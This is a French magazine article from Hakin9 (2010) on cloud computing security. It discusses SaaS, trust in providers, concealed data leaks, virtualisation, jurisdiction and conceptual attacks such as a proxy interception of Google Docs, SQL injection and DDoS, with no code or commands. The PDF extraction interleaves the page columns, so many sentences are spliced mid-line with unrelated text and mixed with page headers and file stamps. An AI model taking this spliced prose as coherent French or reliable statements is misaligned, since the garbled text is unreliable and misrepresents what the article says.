à une répartition des coûts de gestion du système ou dans le siège de l'entreprise et les employés
pourquoi vous deviendrez
dépendant de l'Internet sans fil, dans le temps. Les utilisateurs individuels (utilisant s'y connectaient depuis des terminaux lents mais
pourquoi les script kiddies les services tels que messagerie électronique relativement peu chers. Seule la manière d'accéder
doivent partir et qui les par webmail), les petites entreprises qui ne sont aux ressources a changé : au lieu d'un serveur
remplacera.
pas obligées d'investir dans des équipements on a maintenant recours à tout un réseau de
CE QU'IL FAUT chers et dans une maintenance technique et serveurs. Ce réseau constitue un concept abstrait
SAVOIR les grandes entreprises qui peuvent obtenir pour l'utilisateur et sa réalisation physique n'est pas
avoir des connaissances de quasiment instantanément un nombre plus élevé important (d'où le nom cloud ; computing signifie
base sur les processus de
production,
de ressources peuvent en bénéficier. bien évidemment calcul). Les techniques modernes,
L'accès à une messagerie électronique via comme AJAX, améliorent la façon de présenter les
avoir des notions sur les
attaques type. une interface sur un site Web constitue le meilleur données et le confort de l'utilisation.

50 HAKIN9 03/2010

50_59____koswdowski.indd 50 2010-03-11, 14:42:39


INFORMATIQUE DANS LES NUAGES

Payer les services énorme confiance dans le fournisseur. nos données peuvent par exemple être
SaaS (Service as a Software) est un La question principale est de choisir une lues par un fournisseur malhonnête. Il est
modèle de distribution des logiciels où bonne entreprise et de lui faire confiance, vrai que les données sont cryptées mais
les programmes fonctionnent sur le dit Łukasz Żur de la société Infrastruktura24 les manières de le faire sont diverses
serveur. Seul le résultat du fonctionnement proposant des sauvegardes avec le et variées. Il est possible de voir aussi
de l'application est communiqué aux cloud computing et le modèle SaaS. En bien une situation où le fournisseur de
utilisateurs. Le règlement s'effectue en envoyant les données dans le nuage, services est en possession (!) de la clé de
général en cycle annuel ou mensuel et nous attendons qu'elles soient traitées chiffrement que des manières avancées
il est aussi possible d'acheter un meilleur par des professionnels dont les services de chiffrement dont l'utilisateur a le contrôle
paquet de services, plus de place sur seraient trop chers pour nous si nous complet. Stocker une copie de la clé par
le disque ou de la puissance de calcul voulions les embaucher. D'un côté, c'est le prestataire nous garantit qu'elle ne sera
supplémentaire. Cette solution est pratique une solution sûre mais de l'autre côté, pas supprimée si elle était par exemple
pour le fournisseur et les destinataires. Le
propriétaire du logiciel ne s'expose pas
aux copies illégales de programmes,
reçoit un versement mensuel et attache
les utilisateurs à son programme. Le client
n'est pas obligé de payer immédiatement
le montant total du logiciel, il peut modifier
à tout moment l'étendue des services (par
exemple, s'il a acheté trop de services ou
s'il décide de développer temporairement
son activité). Les petites entreprises et
les personnes individuelles considèrent
comme importante la maintenance
des serveurs par des administrateurs
expérimentés et trouvent important d'avoir
accès à un meilleur équipement. Confier
ses données, en particulier lorsqu'il s'agit
des informations essentielles pour une
entreprise, est toutefois lié à des risques.
La technologie est encore jeune et
aucun règlement n'existe pour proposer
les services de sauvegarde ou de livraison
des logiciels via le cloud computing, ni
de paiement pour le résultat et non pour Figure 1. Antivirus en-ligne emploie un nuage de calcul du fournisseur mais il obtient un
l'application. Le marché progresse toutefois accès complet aux données. Combien d'utilisateurs lira le contrat ?
plus vite que prévu et les analystes de
l'organisation Gartner affirment que sa
valeur dépassera 150 milliards de dollars
en cinq ans. Pendant cette période, les
entreprises veilleront elles-mêmes à créer
des certificats de sécurité appropriés
et à éduquer les utilisateurs mais pour
l'instant, tout le monde n'est pas conscient
du risque. Les petites entreprises qui
souhaitent avoir un accès à un disque sur
un nuage (ou plutôt des disques virtualisés
– cf. l'encadré) pour quelques centaines
d'euros, ne se rendent pas toujours compte
que leurs données peuvent être volées par
exemple par un fournisseur malhonnête.
Pas un jour sans rapport sur une fuite
ou une perte de données. Pour opter pour Figure 2. Outils pour les sauvegardes en-ligne sont des petits programmes qui ont
les services sur un nuage, il faut avoir une l'accès aux centres de données modernes pour un coût peu élevé

03/2010 HAKIN9 51

50_59____koswdowski.indd 51 2010-03-11, 14:42:46


PRATIQUE
stockée sur le même ordinateur local tombé l'étape de formation et le cloud computing Wroclaw et la société Supersafe en 2008
en panne. Dans un tel cas, une sauvegarde est relativement rare. démontrent que seulement 8 % sur 470
chiffrée n'aurait pas été d'une grande utilité. petites et moyennes entreprises protègent
Un fournisseur malhonnête pourrait toutefois Sûr comme dans une les informations importantes en utilisant
demander d'être payé pour déchiffrer les banque ? pour cela des sauvegardes en-ligne. Un
données. De telles situations peuvent avoir Les recherches réalisées par les cadres tiers de toutes les entreprises ont déjà
lieu en ce moment car le marché n'est qu'à scientifiques de l'Ecole Polytechnique de perdu des données précieuses et ont
ressenti des conséquences importantes
y liées. Dans un cas sur quatre, cette perte
a été liée à une panne de l'équipement
informatique ou à une suppression
involontaire par un employé.
Mis à part les sauvegardes, parmi
d'autres solutions populaires qui se servent
du cloud computing se trouvent l'accès
aux suites bureautiques, aux messageries
électroniques et aux antivirus. Des lecteurs
traditionnels ont été en quasi totalité
remplacés par les webmails. Thunderbird
ou Outlook sont capables de ralentir
efficacement les ordinateurs plus anciens ;
lancer une nouvelle suite Office est
quasiment impossible sur ces machines.
L'utilisateur opte donc sans hésiter pour
Figure 3. La virtualisation est liée inséparablement à l'informatique dans les nuages. La
copie d'écran présente Windows XP, SUSE Linux et Windows 7 lancés sur un ordinateur Google Docs, stocke les courriels sur
physique commun un serveur et donne à l'antivirus en-ligne
un accès complet à son ordinateur. Les
spécialistes rappellent que la renommée
de l'entreprise à laquelle nous confions
nos données est très importante. Les
destinataires du service ne savent pas
forcément comment fonctionne en détails
la technologie des nuages de calcul et font
alors confiance au fournisseur. Une erreur
ou une fuite de données depuis une telle
entreprise peut avoir un énorme impact
sur sa position sur le marché. Il faut donc
supposer que de grands fournisseurs feront
tout leur possible de maintenir un niveau
élevé de la sécurité. De l'autre côté, en cas
d'une fuite éventuelle des données ou une
attaque des cybercriminels, elles peuvent
dissimuler ce fait et ne pas le rendre public.
Les banques et les grands services Internet
fonctionnent d'une manière similaire et
essayent de ne pas communiquer une
attaque pour ne pas perdre la renommée.
Il faut se rendre compte que dissimuler les
informations sur une fuite de données ou
une attaque des clients et de l'infrastructure
a ses défauts. Une menace consiste en fait
que les grandes entreprises essayeront
de minimiser la question en assurant
Figure 4. Le nuage de calcul permettra de tout lier : terminaux, ordinateurs faibles et les utilisateurs que leurs données sont
dispositifs d'une puissance de calcul peu élevée protégées. Les situations similaires ont déjà

52 HAKIN9 03/2010

50_59____koswdowski.indd 52 2010-03-11, 14:42:55


INFORMATIQUE DANS LES NUAGES

eu lieu de nombreuses fois. À titre d'exemple, et ne publiera plus de patches pour les téléchargé sur un serveur, il est ensuite
rappelons la fuite l'année dernière d'une failles détectées. Sans support de la part de rendu en prenant en compte les fonctions
base de données de 100000 utilisateurs Microsoft, l'utilisateur sera tout simplement de l'écran du client, il est compressé et
d'un portail communautaire Pendant laissé au gré des cybercriminels. Ce point cette version-là est envoyée à l'écran
plusieurs semaines, ses propriétaires ont concerne également les ordinateurs plus du téléphone. Les serveurs Opera sont
dissimulé l'information que les mots de vieux équipés de Windows 2000 ou 98, chargés de toutes ces opérations et
passe n'étaient plus sûrs et ont assuré, toujours présents. Du premier abord, ces l'application installée sur le téléphone ne
une fois le responsable trouvé, que toutes utilisateurs ont ce qu'ils ont voulu car ils fonctionne que comme client. Google a fait
les copies volées de la base avaient été n'installent pas de patches et utilisent de un pas plus en avance. Il est très difficile
récupérées. Cela semble ridicule car vieux logiciels. L'ordinateur d'un tel utilisateur de déterminer une frontière entre ce qui
comment peut-on vérifier le nombre de fois peut devenir toutefois une station cible pour fonctionne localement dans le système
que les données ont été copiées ? Malgré accéder aux ressources plus précieuses du Android et ce qui fonctionne sur le nuage.
cette situation, les utilisateurs se sont sentis nuage, destinées à un plus grand nombre
rassurés, la police s'est jointe à l'enquête et de personnes. Il est facile d'imaginer un Le nuage, c'est pour qui ?
l'administration publiait des messages sur logiciel malveillant qui se servira du disque Tout le monde ne peut pas se permettre
les progrès. La plupart de situations de ce en-ligne lié à l'ordinateur attaqué ou utilisera d'utiliser des nuages des autres, ils créent
type, en particulier si elles concernent les la puissance de calcul disponible pour donc les leurs, notamment les entreprises
données plus importantes que des mots de craquer les mots de passe. Des attaques et les institutions gouvernementales. Un
passe pour un portail communautaire, ne similaires ont été effectuées à une grande nuage de calcul est en fait un réseau de
sont jamais rendues publiques. échelle (notamment pour craquer les mots serveurs dont la structure ne doit pas être
de passe des utilisateurs du service eBay). essentielle pour les utilisateurs. Toutes les
Attention aux terminaux Remarquons aussi l'importance de entreprises qui ne peuvent pas confier leurs
Les banques se comportent d'une manière plus en plus grande des téléphones données aux fournisseurs des services
similaire dans les situations de crise et mobiles pour lesquels être connecté au externes sont ainsi capables d'utiliser le
les attaques sur des banques seront nuage de calcul donne des possibilités cloud computing. L'objectif principal de
analogiques. Il est plus facile d'attaquer un tout à fait nouvelles. Les versions mobiles cette solution consiste en effet à mieux
seul client qu'un centre de données bien du navigateur Opera constituent ici un très utiliser les ressources et à réduire les
protégé mais la différence en bénéfices bon exemple. Dans ce cas-là, le site est coûts. Un problème apparaît toutefois dans
est aussi significative. Dans quelques
années, lorsque le cloud computing
progressera suffisamment, l'utilisateur
n'aura qu'un netbook, un ordinateur peu
cher ou un téléphone équipés d'un système
d'exploitation et d'un navigateur. La suite
bureautique, le client de messagerie
électronique et autres programmes se
trouveront sur le nuage. L'utilisateur se servira
également du disque en-ligne fourni par le
fournisseur de services. Facile à deviner qui
sera l'objectif d'une attaque. Il semblerait
que le système sera ici exceptionnellement
sécurisé. Malheureusement, ce n'est pas le
cas. Le vieux Windows XP est toujours installé
sur les netbooks, qui ont potentiellement le
plus besoin d'être supporté par le nuage.
Microsoft a même déclaré que ni Vista
ni Windows 7 ne pourraient pas être
installés sur les ordinateurs portables
où la mémoire RAM sera inférieure à 1
Go. Cette solution n'est pas bonne pour
un utilisateur ordinaire ; Vista configuré
par défaut garantira plus de sécurité que
Windows XP standard dépourvu de service
packs. La situation peut empirer lorsque Figure 5. Les suites bureautiques disponibles en-ligne constituent des exemples
Microsoft arrêtera de supporter ce système d'utilisation d'un nuage de calcul

03/2010 HAKIN9 53

50_59____koswdowski.indd 53 2010-03-11, 14:43:05


PRATIQUE
ces systèmes. Il est lié à la gestion des ne suffit pas. Il est nécessaire de maintenir logiciels, à détecter leurs points faibles et à
serveurs et des disques qui sont virtualisés. une connexion constante, les données utiliser les programmes qui profitent de ces
Un concept server sprawl (prolifération des sont en effet échangées tout le temps et failles. Il n'est pas important si le logiciel
serveurs virtuels) est ainsi apparu. Il signifie souvent de manière asynchrone à l'aide de est écrit ou téléchargé depuis Internet.
une augmentation soudaine du nombre AJAX sans rafraîchir la page. Une attaque des milliers ordinateurs
de machines virtuelles qu'il est de plus en Pour résoudre ce problème (du point de simples est similaire, à cette différence
plus difficile de gérer. Le nombre physique vue de l'attaquant), il est possible par exemple près que la question de détection des
d'ordinateurs ou de disques est de moins de mettre le serveur proxy et de modifier le erreurs dans un logiciel est omise. Les
en moins important. Ce qui prévaut est ce navigateur de la victime de sorte qu'elle se cybercriminels infectent le plus grand
que l'utilisateur voit. Les administrateurs se connecte via ce serveur. Si la transmission nombre d'ordinateurs possible en espérant
rendent souvent compte des questions est cryptée (elle ne l'est pas chez Google qu'une partie d'entre eux est équipée des
relatives à la sécurité après avoir mis Docs), il faudrait en plus la craquer. Il ne applications avec failles dont ils pourront
en place la virtualisation. Une pratique s'agit ici que d'un modèle théorique mais il profiter. La question est complètement
courante consiste à fournir les serveurs et est possible de lancer des passages plus différente dans le cas d'un nuage de calcul.
à analyser ensuite comment les protéger, complexes et plus difficiles à détecter. Une Le prestataire ne fournit que l'interface de
dit Rafał Janus. Créer un environnement telle attaque n'est qu'une idée théorique et sa l'application et l'ensemble de calculs se
sécurisé n'est donc pas simple et réalisation en pratique peut être compliquée trouve sur ses serveurs. Si l'architecture de
demande des connaissances. Il faut mais intercepter la connexion est tout à logiciel est bien conçue, la partie utilisée de
ajouter que la virtualisation ne consiste fait possible. Nous pouvons nous attendre l'application doit être sécurisée et protégée
pas seulement à placer plusieurs serveurs à rencontrer dans l'avenir des tentatives complètement contre l'accès depuis
sur une machine physique. Ce concept similaires d'usurper l'identité d'un fournisseur l'extérieur.
concerne également des mémoires de des services de traitement dans le nuage. Cette solution permet de protéger
masse (disques virtuels), des ordinateurs Actuellement, une attaque courante l'application lancée contre la recherche
de bureau et des applications. c'est la SQL injection, autrement dit, des failles et les rend en principe plus
injecter une requête à la base de données sûres. De l'autre côté, les programmes qui
Attaques du futur depuis le site du client. Si le serveur filtre ne quittent pas les serveurs du fournisseur
Des tentatives de se faire passer par le insuffisamment les requêtes envoyées des services peuvent avoir de nombreuses
fournisseur des services constituent un par exemple par le navigateur, l'utilisateur failles que personne ne cherchera à
danger potentiel. Actuellement, il arrive peut le forcer à effectuer des opérations réparer. Si un attaquant réussit à accéder
de faire face aux attaques par phishing dangereuses. Ces erreurs concernent à l'intérieur du système (en corrompant par
(usurpation d'identité des banques ou principalement des systèmes uniques, exemple des employés), il pourrait compter
des services afin d'intercepter le compte créés à la demande ou écrits par des sur le fait que personne ne remarquera les
d'utilisateur) et aux fausses entrées dans les programmeurs inexpérimentés. Dans le failles qu'il trouvera pendant des mois.
serveurs DNS. Les attaquants se servent cas de grandes entreprises, la SQL injection
d'une vitrine intermédiaire qui collecte les a rarement lieu. Une attaque similaire peut Adieu les script kiddies !
données transmises, les enregistre et être effectuée dans le cas des services De telles opérations demandent beaucoup
redirige l'utilisateur immédiatement vers le fonctionnant dans les nuages de calcul. de travail mais peuvent apporter gros.
vrai serveur. Une attaque similaire peut être En analysant les messages envoyés et Actuellement, les petites entreprises et
réalisée par rapport au cloud computing. reçus par le navigateur, l'attaquant peut les particuliers n'ont pas de moyens pour
L'idée principale consiste à intercepter localiser les endroits où il peut ajouter un payer les services des administrateurs
les données envoyées au nuage. code supplémentaire. Contrairement aux expérimentés ou un audit de sécurité
Supposons qu'elles sont précieuses car serveurs des sites Web, qui permettent au des dispositifs sur place. Les utilisateurs
un hébergement payant en-ligne sera plus un accès à la base de données, les ordinaires ne se font pas de souci pour la
utilisé pour stocker des fichiers importants. nuages de calcul peuvent être utilisés pour sécurité de leurs données, applications et
L'idée la plus simple, employée au début lancer un code dangereux voire le placer équipement. Les grandes entreprises qui
dans le phishing, consisterait à créer sur les serveurs de manière constante. proposent leurs services et ressources
son propre service qui ressemble par dans le cadre du modèle SaaS attachent
exemple à Google Docs et à encourager Où attaquer ? davantage de la valeur à la sécurité.
des internautes à l'utiliser. Mais cette Attaquer une machine est toujours plus De plus, elles en seront de plus en plus
démarche demande une infrastructure. À simple qu'attaquer tout un réseau de conscientes avec le développement
la place il serait donc plus intéressant de machines mais dans le cas de nuages du marché et de la concurrence. Les
créer un passage entre l'utilisateur et le de calcul, l'attaque peut cibler plus qu'un spécialistes nous avertissent : la difficulté
nuage Google et d'intercepter seulement serveur individuel. Concernant les serveurs d'accéder à un logiciel attaqué et de trouver
les données intéressantes. Dans ce cas-là, individuels, l'attaque consiste à trouver des des failles ainsi que des qualifications
une page avec le formulaire de connexion services qu'ils proposent, à identifier les indispensables feront augmenter les prix

54 HAKIN9 03/2010

50_59____koswdowski.indd 54 2010-03-11, 14:43:12


INFORMATIQUE DANS LES NUAGES

des exploits et des informations sur les pourraient commencer à protéger de gratuit au téléphone, aux ressources
« failles jour 0 ». Une attaque d'un centre de tels utilisateurs. À titre d'exemple, le travail de l'ordinateur central ou voulaient tout
données ou des nuages de serveurs ne de toutes les cartes dans un processus simplement prouver aux autres que le
pourra plus être utilisée par des amateurs séparé devrait devenir standard, comme système n'est pas sûr. Les attaques
qui ont trouvé par hasard des programmes c'est le cas chez Google Chrome. De l'autre n'étaient pas un acte de vandalisme mais
appropriés sur le Net (script kiddies) côté, les fournisseurs des services peuvent servaient à des objectifs définis. Bien
mais deviendra le domaine de groupes ne pas autoriser certains utilisateurs, évidemment, les attaques étaient centrée
capables d'investir dans leurs propres qui se servent des logiciels vétustes et sur des grandes entreprises mais en
programmeurs ou de corrompre des dangereux, d'accéder au Net. Actuellement, réalité elles étaient les seules victimes, en
employés d'une entreprise attaquée afin afin d'accéder à une partie de ressources, plus des concurrents des hackers.
de faire sortir le programme à l'extérieur. liées en particulier à la sauvegarde de Plus tard, avec la propagation de
La plupart de personnes pourraient en données, il faut utiliser des logiciels clients l'Internet, nous avons vu arriver des
être contents : finis les attaques pour fournis par le fournisseur des services. Il criminels qui guettaient des internautes
s'amuser ou pour se vanter devant des semble donc naturel que tout le monde inconscients, à qui il était toujours facile de
copains, mais l'avenir n'est pas si rose. Les n'autorisera pas des navigateurs anciens voler des mots de passe, qui ne modifiaient
salles de serveurs sont bien évidemment et dangereux d'entrer sur le Net ou ces pas les mots de passe par défaut et qui
pour des raisons évidentes (comme des navigateurs ne seront pas tous supportés. installaient tout et n'importe quoi. De l'autre
administrateurs expérimentés) plus sûres Nous le remarquons en ce moment avec côté, les hooligans d'Internet n'ont pas du
qu'un ordinateur à domicile ou au bureau l'approche des banques qui fonctionnent mal d'obtenir des outils et donc de passer
mais les applications utilisées dans le cloud de manière similaire que les entreprises aux attaques. Utiliser un exploit téléchargé
computing peuvent être plus dangereuses. liées au cloud computing. depuis Internet pour faire une blague à
Une mafia ou un gouvernement d'un pays un copain peut être amusant mais les
se préparant à une cyber-guerre peuvent Retour aux sources attaques réalisées par des personnes
prendre le contrôle des attaques sur les Les changements dans l'approche de qui n'ont aucune idée de ce que fait le
nuages de calcul. Le retour à l'époque la sécurité peuvent signifier le retour aux programme téléchargé consistent en
des groupes d'hackers serait la meilleure débuts du hacking. Lorsque les mauvais général à détruire sans aucune raison
perspective possible parce que personne hackers apparaissaient, cracker les une base de données des autres ou des
de raisonnable ne pourrait parier qu'avec le protections ne consistait pas à télécharger données sur un serveur FTP.
transfert de la plupart de services dans les des scripts prêts depuis Internet ou à Si le cloud computing se développe
nuages, les problèmes avec les attaques acheter un magazine, à l'ouvrir sur la page jusqu'au moment où nous n'utiliserons
des données disparaîtront. Elles passeront consacrée aux Attaques et à utiliser les qu'un navigateur, nous pourrons nous
tout simplement à un niveau supérieur, programmes décrits. Il allait les inventer attendre à plus de professionnalisme de
inaccessible à la plupart de gens. d'abord. Les personnes qui crackaient la part du hacking. Les serveurs Web et
De l'autre côté, en dehors du nuage les protections avaient pour but un accès FTP d'entreprise disparaîtront suivi par la
sûr, il existe des milliers d'utilisateurs
ordinaires qui se servent des milliers de
navigateurs différents sur des centaines
de systèmes d'exploitation. En transférant
leurs programmes sur le Net, ils mettent
la responsabilité pour leurs ressources
à des administrateurs et fournisseurs
des services. Dans une telle situation, ils
peuvent perdre complètement conscience
de la question de la sécurité. Une utilisation
constante des services partagés via le Net,
y compris la protection antivirus, peut donc
ramener à la disparition de la conscience
quant aux menaces venant de l'Internet
et à une plus grande confiance pour les
programmes lancés du côté du serveur.
Ces changements ne seront pas toutefois
importants.
Les fabricants des logiciels installés
sur les machines locales (et il s'agira dans Figure 6. Emplacement des 38 centres de données de Google. Source :
l'avenir principalement des navigateurs) wayfaring.com/

03/2010 HAKIN9 55

50_59____koswdowski.indd 55 2010-03-11, 14:43:18


PRATIQUE
plupart de logiciels locaux dont les failles des sorties des employés ou le support des des milliers de kilomètres de l'utilisateur,
constituent souvent une raison d'attaques messages internes et des imprimantes ne influenceront considérablement la vitesse
sur les utilisateurs ordinaires. demandent pas l'accès à Internet. De l'autre de la transmission. Dans ce cas-là, il est
côté, les tâches qui n'ont pas d'impact direct important de placer des serveurs à proximité
Dépendants du fournisseur sur la production (sauvegarde, serveur de des endroits d'où le plus grande nombre
Une absence soudaine d'accès au Net messagerie externe, hébergement des sites de personnes se connecte. La question
peut constituer un problème plus grave Web) peuvent être transférées à l'extérieur. n'est pas si simple. Google précise que
que les attaques des meilleurs hackers. Les Avoir son propre nuage garantit bien créer un centre de données coûte environ
utilisateurs individuels se servent rarement évidemment une plus grande sécurité et 600 millions de dollars et la maintenance
d'un ordinateur qui n'est pas connecté à une indépendance vis à vis des fournisseurs annuelle de tous les centres de données
Internet et la tendance d'être tout le temps d'Internet mais restreint la qualité de base s'élève à environ 3 milliards de dollars.
en-ligne s'accentuera. Si la plupart de du cloud computing, à savoir l'évolutivité. L'emplacement des centres de données
services, de programmes et de données Dans les deux cas, nous devenons a un grand impact sur les dépenses. On opte
seront transférés dans les nuages de calcul toutefois dépendants du fournisseur pour les endroits qui garantissent un accès
disponibles uniquement via Internet, se d'Internet. Dans les pays où un seul à une énergie pas chère et verte. L'accès
déconnecter du Net peut alors être assimilé fournisseur de technologies GSM propose aux rivières et aux lacs dont l'eau est utilisée
à une catastrophe. Dans plusieurs années, ces services, il peut donc décider des à refroidir les salles de serveurs ainsi que
grâce à une meilleure utilisation de GSM et à frais car il sait que les clients payeront l'environnement pour assurer une sécurité
une apparition de WiMAX, l'accès à Internet tout prix pour avoir l'accès à Internet. sont importants. On prend également en
sans fil se généralisera mais il existera Si en plus, l'opérateur est contrôlé par compte les impôts dans le pays donné et
toujours des endroits hors de portée. Même le gouvernement, comme c'est le cas la distance depuis les centres de données
si le monde est couvert de signal, des en Émirats Arabes Unis, des tentatives existantes. Grâce à une telle optimisation,
pannes peuvent avoir lieu et avoir comme de contrôler les gestes des utilisateurs il est possible d'obtenir la réponse à des
résultat la déconnexion des centaines ou de les déconnecter d'Internet, voire requêtes les plus complexes au navigateur
de personnes du Net. Leurs ordinateurs d'ordinateurs peuvent avoir lieu. Nous après une dixième fraction de seconde et
deviendront alors quasiment inutiles. La arrivons de nouveau au point où il faut faire nous obtenons de l'aide au fur et à mesure
question de l'entreprise est différente, surtout confiance à une nouvelle entreprise. en saisissant les requêtes. À chaque fois
des entreprises traditionnelles, centrées sur L'emplacement physique de la salle de que nous appuyons sur le clavier, plusieurs
la production. Dans leur cas, l'accès à un serveurs a une grande importance pour les dizaines de serveurs Google, situés dans
réseau externe n'est pas nécessaire tout plus grandes entreprises fournissant les des parties différentes du monde, se
le temps et les nuages de calcul locaux services dans le modèle cloud computing. mettent à travailler. L'énergie utilisée par ces
peuvent fonctionner de manière autonome. Si les services doivent être proposés serveurs suffit apparemment à faire bouillir
Les tâches comme le contrôle de partout dans le monde, les retards liés 100 ml d'eau (moitié d'un verre).
production, la journalisation des entrées et au transfert des données au serveur situé
Nous payerons pour avoir
Sécurité ? Pas tout de suite des nuages sûrs !
La sécurité de données stockées dans les nuages représente, au moins pour l'instant, peu Les cadres dirigeants IT attendent une
d'importance pour les clients. Entretien exclusif avec Karl Obluk, directeur technologique chez AVG protection de données et d'applications
Technologies, pour le magazine hakin9. fonctionnant dans le nuage. 89 % des
Est-ce que les clients font confiance aux services dans les nuages ou est-ce qu'ils préfèrent les personnes questionnées l'affirment d'après
solutions locales ?
les recherches effectuées en octobre 2009
Il me semble que de nombreux utilisateurs qui stockent leurs données en-ligne ne sont pas
par Trend Micro, société fournissant les
tout à fait conscients des implications liées aux questions de la sécurité. Ils font confiance aux
fournisseurs de ces services et leur plus grand souci est que la durée de téléchargement des solutions de protection de l'infrastructure
fichiers (sauvegarde) soit la plus courte possible. Avec l'augmentation du nombre de fonctionnalités partagée par Internet (security for-the-
proposées par les fournisseurs et le débit de plus en plus grand de la connexion, les solutions de cloud). Malheureusement, seulement 40 %
ce type peuvent devenir de plus en plus populaires. de personnes questionnées ne prennent
Comment le cloud computing changera-t-il l'approche d'un utilisateur ordinaire à la question en compte que des solutions sûres. Les
de la sécurité ?
autres préfèrent l'évolutivité et la réduction
Vu que protéger les données de ce type est très compliqué, la plupart d'utilisateurs font
confiance aux fournisseurs des services de sauvegarde en se basant sur des recommandations des coûts. Une telle approche peut être
et des critiques. Bref, je ne pense pas que les nuages de calcul changent profondément l'approche liée au fait que ces personnes n'ont pas de
d'un simple utilisateur à la question de la sécurité. connaissances suffisantes sur la question
Comment les données stockées dans les nuages, sont-elles protégées ? de sécurité (c'est triste) ou qu'elles calculent
La manière de protéger les données dépend en grande partie du fournisseur. Il peut s'agir d'un que le risque de perdre des données
simple codage avec une clé qu'a le fournisseur du service, des systèmes de sécurité pourvus des
récompense tous les bénéfices potentiels.
mécanismes complexes de codage où c'est l'utilisateur qui a la clé.
De l'autre côté, 61 % de personnes

56 HAKIN9 03/2010

50_59____koswdowski.indd 56 2010-03-11, 14:43:31


INFORMATIQUE DANS LES NUAGES

questionnées ne sont pas encore prêtes à salles de serveurs et des applications qui identiques que pour d'autres services de
transférer l'infrastructure dans les nuages y fonctionnent. Les dangers de base sont ce type (dommages physiques, erreurs
mais elles veulent utiliser cette technologie
dès qu'elle sera davantage sécurisée.
Les clients potentiels des fournisseurs Nuage dans les yeux du client
des logiciels, qui servent à créer des nuages, Dorota Oviedo, analyste du marché ICT de la société Frost & Sullivan (www.frost.com), nous dit
comment les clients individuels et les entreprises perçoivent le fait de stocker et de traiter des
attendent d'eux de faire particulièrement
informations dans les nuages de calcul.
attention à créer des solutions sûres et Les nuages de calcul et la distribution de logiciels dans le modèle SaaS sont non seulement
une manière de les certifier. Actuellement, des concepts à la mode dans le secteur ICT mais aussi des tendances claires du marché
il est difficile de comparer les systèmes d'aujourd'hui. Les plus grands acteurs investissent actuellement dans les infrastructures basés sur
concurrents et les fournisseurs soulignent les nuages de calcul. Les leaders du marché de télécommunication unifiée et de travail en équipe
eux-mêmes que les clients se basent promeuvent Saas, ce que nous pouvons remarquer par exemple chez Cisco et WebEx, IBM et
LotusLive ou bien Microsoft et des services de la gamme BPOS. De plus, la popularité des médias
principalement sur la confiance et les
communautaires et de la messagerie électronique comme Gmail chez les utilisateurs individuels
recommandations d'une entreprise donnée.
aide à accepter le concept de nuages.
Le système universel de certificats pourrait Ce qui est intéressant, ce que aussi bien les petites que les grandes entreprises portent l'intérêt
résoudre ce problème. Aussi bien les à ces services et demandent aux fournisseurs des services d'administrer, de garantir l'accessibilité
utilisateurs qui auraient un choix facilité que et la sécurité, ce qui leur permet de se concentrer davantage sur le développement de leur activité
les entreprises honnêtes en auraient profité. principale.
Le ralentissement de l'économie mondiale aide décidément ce marché de services à
progresser. Actuellement, les entreprises préfèrent les solutions basées sur les dépenses courantes.
Fournisseurs ciblés Les plus petites entreprises font également attention au niveau d'avancement des systèmes de
Une attaque peut toucher un prestataire communication commerciale moderne ainsi qu'à l'absence d'un personnel qualifié pour gérer ces
et non seulement les utilisateurs du systèmes. Dans le cas de grandes entreprises, la souplesse des services de télécommunication
cloud computing. Il est facile d'imaginer permet de tester les outils disponibles. Bien que la perte de contrôle et la sécurité soient citées
une situation où les utilisateurs – des comme la menace principale pour le développement du marché, le renommé d'un fournisseur
particuliers – pourraient essayer d'obtenir des services, les contrats SLA (standard de services) et les exemples de solutions mises en place
réduisent les craintes des clients potentiels. En pratique, l'attention est portée surtout au coût, en
plus de ressources que prévues pour eux.
particulier par les petites entreprises.
Il faut donc faire attention à la sécurité des

P U B L I C I T É

03/2010 HAKIN9 57

50_59____koswdowski.indd 57 2010-03-11, 14:43:37


PRATIQUE
des employés) et les administrateurs augmenter l'utilisation des serveurs mais stocker des données personnelles sont
expérimentés peuvent donc y remédier. pas seulement. Nous nous éloignons réduits dans d'autres pays. Certaines
N'oublions pas les attaques de l'extérieur du modèle où plusieurs applications entreprises s'adaptent aux règlements
(par exemple, DDoS) et les tentatives différentes se trouvaient sur un serveur et internationaux et locaux, par exemple,
de lancer un code dangereux par les nous passons à la solution où une seule nous ne pouvons pas voir des films sur
utilisateurs. application se trouve sur un serveur virtuel. YouTube qui ne sont pas autorisés par la
La distribution du nuage de calcul Par conséquent, le nombre de machines législation du pays donné. De nouveaux
constitue sa qualité incontestable du point virtuelles augmentera considérablement problèmes apparaissent toutefois avec
de vue de la sécurité. Les attaques Dos et et il faudra les gérer toutes, dit Rafa le développement du cloud computing.
DDoS, qui consistent à inonder le serveur Kwa ny de la société Novell pendant le Est-ce qu'un document traité sur un
des nombreuses requêtes et à épuiser débat mené par le service VirtualFocus. serveur allemand par un utilisateur
les ressources, menacent la plupart de La diffusion des applications en machines français est soumis à la législation
services centralisés. La protection contre virtuelles autonomes permet de protéger française ou allemande ? Et que faire
des milliers de fausses requêtes consiste tous les clients contre l'attaque sur des si le même document est utilisé par
en effet à les filtrer par le serveur. Dans le applications individuelles. Il existe un plusieurs dizaines de serveurs situés
cas d'un nuage de calcul, la charge est risque de prendre le contrôle sur les dans les centres de données dans
divisée entre plusieurs machines et le applications et les données protégées des pays différents ? Et que faire si le
risque d'épuiser les ressources d'un seul dans les systèmes sans virtualisation système d'exploitation de l'utilisateur est
ordinateur est ainsi plus bas. ou les systèmes qui combinent plusieurs virtualisé ? Et si l'utilisateur commet un
La protection physique des données services sur la même machine. C'est crime, il est impossible de savoir quel
est également facilitée dans le nuage. possible grâce à une attaque sur les serveur, parmi tous ceux qui se trouvent
Dans les solutions professionnelles, les solutions moins sûres sur la même sur le nuage, a effectué des opérations
données sont stockées dans plusieurs machine. La structure : un système - une illégales. Même si certains pays règlent
salles de serveurs pour garantir un application réduit considérablement ce ces situations, cela ne les concerne
accès rapide depuis tout endroit dans le risque. Si l'attaquant prend le contrôle du pas tous. De plus, les lois peuvent être
monde. Les serveurs sont donc éloignés programme non protégé, il accédera à contradictoires.
physiquement l'un de l'autre, ce qui protège un système virtualisé où aucune donnée Les spécialistes des entreprises
contre un incendie dans une salle de importante ne se trouve. fournissant les solutions pour le
serveurs, une panne d'une machine et des cloud computing ne prévoient pas
erreurs des employés. Trop rapide pour la loi de changements importants dans
La virtualisation a une grande Le nuage de calcul est un concept l'approche des utilisateurs ordinaires
importance dans le cas des entreprises tellement abstrait qu'un règlement pour la question de la sécurité. Mais
fournissant des services dans le modèle juridique de ce type de services peut transférer la plupart de logiciels dans
